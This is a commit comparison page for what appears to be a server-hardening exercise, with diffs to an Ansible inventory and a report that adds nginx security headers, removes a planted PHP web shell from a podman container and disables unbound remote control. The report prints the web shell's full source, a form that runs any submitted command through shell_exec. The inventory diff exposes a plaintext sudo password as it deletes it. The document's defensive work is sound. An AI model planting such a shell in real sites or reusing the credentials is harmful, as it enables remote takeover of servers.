Compare commits
2 Commits
512acb8db3
...
0c57c12ac8
Author | SHA1 | Date |
---|---|---|
Gašper Spagnolo | 0c57c12ac8 | |
Gašper Spagnolo | d51c0e8665 |
|
@ -5,7 +5,6 @@ all:
|
||||||
ansible_connection: ssh
|
ansible_connection: ssh
|
||||||
ansible_become: yes
|
ansible_become: yes
|
||||||
ansible_become_method: sudo
|
ansible_become_method: sudo
|
||||||
ansible_host: ml-node
|
ansible_host: 64.227.120.192
|
||||||
ansible_ssh_user: ml-node
|
ansible_ssh_user: root
|
||||||
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ml-node"
|
ansible_ssh_private_key_file: "/home/spagnologasper/.ssh/keys/id_ed25519_ls2024_prep"
|
||||||
ansible_become_pass: dobercaj420
|
|
||||||
|
|
105
report/Report.md
105
report/Report.md
|
@ -274,6 +274,90 @@ server {
|
||||||
```
|
```
|
||||||
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.
|
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.
|
||||||
|
|
||||||
|
Lets enable xss protection in the nginx configuration.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
location /2048/ {
|
||||||
|
proxy_pass http://localhost:8018/;
|
||||||
|
proxy_set_header Host $host;
|
||||||
|
# Add security headers
|
||||||
|
add_header X-Frame-Options "SAMEORIGIN";
|
||||||
|
add_header X-Content-Type-Options "nosniff";
|
||||||
|
add_header X-XSS-Protection "1; mode=block";
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
And deny access to the all `.` files.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
location ~ /\. {
|
||||||
|
deny all;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
The process is run by the `conmon` process.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:~# sudo lsof -i :8018
|
||||||
|
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
|
||||||
|
conmon 1147 root 5u IPv4 19949 0t0 TCP *:8018 (LISTEN)
|
||||||
|
|
||||||
|
root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
|
||||||
|
```
|
||||||
|
|
||||||
|
It is a podman container.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:~# podman ps
|
||||||
|
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
|
||||||
|
4d05d4a1a404 docker.io/nejec/2048:latest apache2-foregroun... 2 hours ago Up 2 hours ago 0.0.0.0:8018->22/tcp 2048
|
||||||
|
root@ls-2024-9:~#
|
||||||
|
```
|
||||||
|
|
||||||
|
When going into the container we can see the php reverse shell script.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:~# podman exec -it 4d05d4a1a404 bash
|
||||||
|
root@4d05d4a1a404:/var/www/html# ls
|
||||||
|
app.js assets index.html manifest.json service-worker.js shell.php style.css
|
||||||
|
root@4d05d4a1a404:/var/www/html# cat shell.php
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<meta charset="utf-8">
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||||
|
<title>CMD</title>
|
||||||
|
<style type="text/css">
|
||||||
|
body {
|
||||||
|
background: black;
|
||||||
|
font-family: courier,arial;
|
||||||
|
color: white;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<br/><br/><br/>
|
||||||
|
<center>
|
||||||
|
<form method="POST">
|
||||||
|
<input type="text" name="cmd" placeholder="cmd" size=100/>
|
||||||
|
<input type="submit" value="exec"/>
|
||||||
|
</form>
|
||||||
|
</center>
|
||||||
|
<br/><br/><br/>
|
||||||
|
<?php
|
||||||
|
if(isset($_POST['cmd'])){
|
||||||
|
echo nl2br(shell_exec($_POST['cmd'].' 2>&1'));
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
</body>
|
||||||
|
root@4d05d4a1a404:/var/www/html#
|
||||||
|
```
|
||||||
|
|
||||||
|
Lets remove the file now.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php
|
||||||
|
```
|
||||||
|
|
||||||
### Already f-up something
|
### Already f-up something
|
||||||
|
|
||||||
|
@ -378,3 +462,24 @@ Host ls2024_prep
|
||||||
|
|
||||||
### DNS
|
### DNS
|
||||||
|
|
||||||
|
Problem here is that remote control is enabled and we can use it to get the root shell.
|
||||||
|
|
||||||
|
```txt
|
||||||
|
root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf
|
||||||
|
# default unbound control
|
||||||
|
remote-control:
|
||||||
|
control-enable: yes
|
||||||
|
control-interface: ::0
|
||||||
|
control-use-cert: no
|
||||||
|
```
|
||||||
|
|
||||||
|
Lets disable remote control completely. and restart the service.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
|
||||||
|
```
|
||||||
|
|
||||||
|
This is all I found suspicious in the DNS configuration.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue